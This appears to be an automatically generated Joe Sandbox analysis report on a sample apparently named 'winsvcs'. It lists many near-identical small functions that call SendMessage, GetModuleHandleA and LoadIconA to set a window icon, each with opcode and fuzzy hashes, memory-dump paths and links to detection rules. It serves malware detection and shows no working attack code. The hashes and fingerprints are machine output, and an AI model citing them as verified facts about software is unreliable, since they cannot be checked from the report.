API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
Instruction ID: 5c5ea486f8d86452672809949b6ea6ac6bdc788aae214913a2807fc9deb95fd5
Opcode Fuzzy Hash: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
Instruction Fuzzy Hash: 65E04C71299614BAF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF95C42477D

Function 0040F54E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F558
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F568
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F570
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F57C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F58B

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
Instruction ID: 4336a379e938bec1e0ea5ab87b831ef1b692dabbd56aec1cc90c95ce917f6d54
Opcode Fuzzy Hash: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
Instruction Fuzzy Hash: 10E04C712896147AF65117B05C4EFFA352DAB14B01F105420F796E91D0CAF85C42477D

Function 0040F96D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F977
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F987
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F98F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F99B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9AA

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
Instruction ID: 855d6a06f1f245b68fde2b1a20fd1fb7be06e334370c2da90505ec6d8b0432c5
Opcode Fuzzy Hash: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
Instruction Fuzzy Hash: F9E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85D42477D

Function 0040F506 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F510
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F520
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F528
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F534
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F543

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
Instruction ID: 137df8c84f76daae2b18901c05a7a40a4d47098fd36d39e3025c756ee9ed29a4
Opcode Fuzzy Hash: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
Instruction Fuzzy Hash: BCE042B1288304BAF65017B05C4EFBA362DA714B02F106820B792E91D1CAF8AC428B3D

Function 0040F925 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F92F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F93F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F947
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F953
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F962

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
Instruction ID: c34b6a3563cd7af2964a3b0a4b55fe3fcf32e415c952ee7c54061f4af326a4b5
Opcode Fuzzy Hash: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
Instruction Fuzzy Hash: D1E042B1289714BAF65117B05C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F5DE Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5E8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5F8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F600
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F60C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F61B

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
Instruction ID: 429cbd9149b55361b38364805ecf70f412a373ee621004217eed38f5c464dd76
Opcode Fuzzy Hash: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
Instruction Fuzzy Hash: 5BE042B1289614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7D

Function 0040F9FD Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA07
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA17
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA1F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA2B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA3A

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
Instruction ID: c72f6ad03f353f561a99e758367ef941d0c916186b8f8285fa4e34984247ba56
Opcode Fuzzy Hash: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
Instruction Fuzzy Hash: 31E042B1289614BAF65117B05C4EFFA362DAB14B02F106520F792E91D0CAF86C428B7D

Function 0040F596 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5A0
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5B0
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F5B8
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F5C4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F5D3

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
Instruction ID: b6dd8b5b4e134736a0db0f6dc2b81ca2b1be5616f72a07522d348ec5361ba80b
Opcode Fuzzy Hash: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
Instruction Fuzzy Hash: 0DE042B1289614BAF65117B05C4EFFA362DAB14B02F106421F792E95D0CAF86C428B7D

Function 0040F9B5 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F9BF
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F9CF
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F9D7
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F9E3
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9F2

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
Instruction ID: d34a4e6785fcd5d8804060be10e08f5a13504dab63f5c32d185528fae42e6cbc
Opcode Fuzzy Hash: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
Instruction Fuzzy Hash: C5E042B1689614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF86C428B7D

Function 0040FA45 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA4F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA5F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA67
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA73
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA82

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
Instruction ID: b7b077b0efbaa99d57c9e01e78f00ef8fa4a74ec0cbc48e40112d5a6e4ee9a6e
Opcode Fuzzy Hash: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
Instruction Fuzzy Hash: 47E04CB12883047AF65017B05C4EFB6352DA714B01F106820B792E91D1CAF85C42473D

Function 0040F27B Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000172), ref: 0040F288
SendMessageA.USER32(C033FFFF,00000080,00000001,00000000), ref: 0040F298
GetModuleHandleA.KERNEL32(00000000,?,00000172), ref: 0040F2A0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2AC
SendMessageA.USER32(C033FFFF,00000080,00000000,00000000), ref: 0040F2BB

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
Instruction ID: d99028b12e30fd3fe39ac89642547f447b9f6d686350d1e6dd1f500a3f642d4a
Opcode Fuzzy Hash: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
Instruction Fuzzy Hash: D6E0ECB12887107BF65017A05C4EFEA352CAB14B01F105120F792AA1D0CAF85C42477D

Function 0040F2C6 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F2D0
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F2E0
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F2E8
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2F4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F303

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
Instruction ID: 6d76136d54f134a665c01184275cec0f141023eb7b6fb85ea418c97ed7197620
Opcode Fuzzy Hash: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
Instruction Fuzzy Hash: DCE04CB12883047BF65017B05C4EFB6362DA714B01F106420B792E91D1CAF85C42473D

Function 0040FAD5 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FADF
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAEF
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAF7
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB03
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB12

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
Instruction ID: b992e7cc074c589086062039aad7a199eea489cb61b4551384fa19084778ec30
Opcode Fuzzy Hash: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
Instruction Fuzzy Hash: EEE04C712896147AF65117B05C4EFFA352DAB14B02F105520F796E91D0CAF85D42477D

Function 0040F6D9 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F6E3
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6F3
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6FB
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F707
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F716

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
Instruction ID: 3e28eb3131572d2fac298909779aa96aa2a87ebeacc2675cd42585d1acf75fde
Opcode Fuzzy Hash: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
Instruction Fuzzy Hash: CEE04C716896147AF65117B05C4EFFA352DAB14B01F109420F792E91D0DAF86C42477D

Function 0040FA8D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA97
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAA7
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAAF
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FABB
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FACA

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
Instruction ID: 1d36f7c1484a4d98f76bcf46e8ebade4d22d25235dcfb774b2c89be6bd50a90d
Opcode Fuzzy Hash: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
Instruction Fuzzy Hash: D3E0EC712886007AF65017B05C0EFFA352CAB14B02F105420F792E90D0CAF85C42473D

Function 0040F691 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F69B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6AB
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6B3
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F6BF
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F6CE

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
Instruction ID: c4bcc1e1c1be38c76109329eba7caa4c6fa0630b5fa9804ec52db424150adb96
Opcode Fuzzy Hash: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
Instruction Fuzzy Hash: 36E042B1289614BAF65117B05C4EFFA362DAB14B02F10A420F792E91D0CAF86C468B7D

Function 0040F356 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F360
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F370
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F378
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F384
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F393

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
Instruction ID: f7383a7ab23df242e51286724413437d4e223c1a3943708dcd5a078a45c667a9
Opcode Fuzzy Hash: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
Instruction Fuzzy Hash: 64E042B1288304BAF65117B06C4EFBA362DA714F02F106524F792E91D0CAF96C529B3E

Function 0040FB65 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB6F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB7F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB87
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB93
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FBA2

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
Instruction ID: 4017f48e94712bf2f969ea7e51899ef551f7e2015cd638675003ecdf66d8c9fa
Opcode Fuzzy Hash: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
Instruction Fuzzy Hash: 4BE04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85C42477D

Function 0040F769 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F773
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F783
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F78B
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F797
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7A6

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
Instruction ID: 71a0b32a7878cc80f8160acc97d736f4d43d5bc296ae39aaeaecc328a0f48766
Opcode Fuzzy Hash: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
Instruction Fuzzy Hash: 51E04C716897147AF65117B05C4EFFA352DAB14B01F105520F792E91D0CAF86C42477D

Function 0040F30E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F318
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F328
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F330
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F33C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F34B

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
Instruction ID: 334fcfc35a5dd8afaa864d8e0f73d07486cccace6e0d136221b9713eec3d01bf
Opcode Fuzzy Hash: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
Instruction Fuzzy Hash: EBE042B1289714BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7E

Function 0040FB1D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB27
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB37
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB3F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB4B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB5A

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
Instruction ID: 0b98619118816d2a2a2b8005e09654c782942d7a3eccd87f9c26c283519b54bc
Opcode Fuzzy Hash: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
Instruction Fuzzy Hash: 4DE04C712896147AF65117B05C4EFFA352DAB14B02F105420F792E91D0CAF95D424B7D

Function 0040F721 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F72B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F73B
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F743
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F74F
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F75E

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
Instruction ID: b83773e1df3edd97bc25a0b786c3283d31d19127a53598c0ef36f1eb61ead98d
Opcode Fuzzy Hash: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
Instruction Fuzzy Hash: 37E04C716896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D

Function 0040F3E6 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3F0
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F400
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F408
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F414
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F423

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
Instruction ID: 2b10cc25e026ddcf9697d52d97dd030663e87e79539ddb17dd0f1381a82fdc3c
Opcode Fuzzy Hash: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
Instruction Fuzzy Hash: C3E04CB1288304BAF65017B05C4EFB6352DA714B01F106520B792E91D1CAF85C42477D

Function 0040F7F9 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F803
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F813
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F81B
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F827
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F836

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
Instruction ID: 262968f47342c6bcf14978d3074c3fef03dfaca683abf3537834e770978e0ce4
Opcode Fuzzy Hash: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
Instruction Fuzzy Hash: 87E042B1299614BAF65117B09C4EFFA362DEB14B02F106420F792E91D0CAF86D428B7D

Function 0040F39E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3A8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F3B8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F3C0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F3CC
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F3DB

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
